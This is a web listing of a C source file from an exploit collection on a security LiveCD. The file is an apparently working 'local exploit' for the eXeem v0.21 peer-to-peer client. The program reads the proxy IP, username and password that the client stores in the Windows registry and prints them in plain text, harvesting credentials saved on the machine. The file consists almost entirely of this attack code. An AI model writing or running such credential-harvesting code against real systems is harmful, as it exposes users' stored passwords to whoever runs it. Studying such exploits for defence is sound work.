home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / p2p / exeem / eXeem021.c < prev   
C/C++ Source or Header  |  2005-03-05  |  3KB  |  84 lines

  1. /*****************************************************************
  2.  
  3. eXeem v0.21 Local Exploit by Kozan
  4.  
  5. Application: eXeem v0.21
  6. Vendor: www.exeem.com
  7. Vulnerable Description: eXeem v0.21 discloses passwords
  8. for proxy settings to local users.
  9.  
  10. Discovered & Coded by: Kozan
  11. Credits to ATmaCA
  12. Web : www.netmagister.com
  13. Web2: www.spyinstructors.com
  14. Mail: kozan[at]netmagister[dot]com
  15.  
  16. *****************************************************************/
  17.  
  18. #include <stdio.h>
  19. #include <windows.h>
  20.  
  21. #define BUFSIZE 100
  22. HKEY hKey;
  23. char proxy_ip[BUFSIZE],
  24.         proxy_username[BUFSIZE],
  25.         proxy_password[BUFSIZE];
  26.  
  27. DWORD dwBufLen=BUFSIZE;
  28. LONG lRet;
  29.  
  30. int main()
  31. {
  32.  
  33.        if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
  34.                                        0,
  35.                                        KEY_QUERY_VALUE,
  36.                                        &hKey) == ERROR_SUCCESS)
  37.    {
  38.  
  39.                lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
  40.                                                       (LPBYTE) proxy_ip, &dwBufLen);
  41.  
  42.                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
  43.                                 RegCloseKey(hKey);
  44.                                 printf("An error occured!\n");
  45.                                 return 0;
  46.                        }
  47.  
  48.                lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
  49.                                                       (LPBYTE) proxy_username, &dwBufLen);
  50.  
  51.                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
  52.                                 RegCloseKey(hKey);
  53.                                 printf("An error occured!\n");
  54.                                 return 0;
  55.                        }
  56.  
  57.                lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
  58.                                                       (LPBYTE) proxy_password, &dwBufLen);
  59.  
  60.                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
  61.                                 RegCloseKey(hKey);
  62.                                 printf("An error occured!\n");
  63.                                 return 0;
  64.                        }
  65.  
  66.                RegCloseKey(hKey);
  67.  
  68.                printf("eXeem v0.21 Local Exploit by Kozan\n");
  69.                printf("Credits to ATmaCA\n");
  70.                printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
  71.                printf("Proxy IP           : %s\n",proxy_ip);
  72.                printf("Proxy Username     : %s\n",proxy_username);
  73.                printf("Proxy Password     : %s\n",proxy_password);
  74.  
  75.    }
  76.        else
  77.        {
  78.        printf("eXeem v0.21 is not installed on your pc!\n");
  79.    }
  80.  
  81.        return 0;
  82. }
  83.  
  84.